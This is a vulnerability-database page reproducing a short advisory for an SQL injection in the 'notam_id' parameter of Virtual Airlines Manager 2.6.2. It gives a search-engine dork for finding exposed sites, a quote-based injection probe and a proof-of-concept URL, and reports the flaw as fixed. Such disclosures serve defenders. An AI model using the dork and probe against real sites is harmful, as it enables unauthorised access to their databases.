Virtual Airlines Manager 2.6.2 SQL Injection

2020.06.08

Credit: Pankaj Kumar Thakur

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:notam_id=

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
# Date: 2020-06-07
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: inurl:notam_id=
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
Vulnerable parameter
-------------------
notam_id=%27%27
Id parameter's value is going into sql query directly!
Proof of concept
---------------
https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27
Submitted: Jun 1 2020
Fixed: Jun 5 2020
Acknowledgement : https://ibb.co/Y3WYdFN

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Virtual Airlines Manager 2.6.2 SQL Injection

Dork: inurl:notam_id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.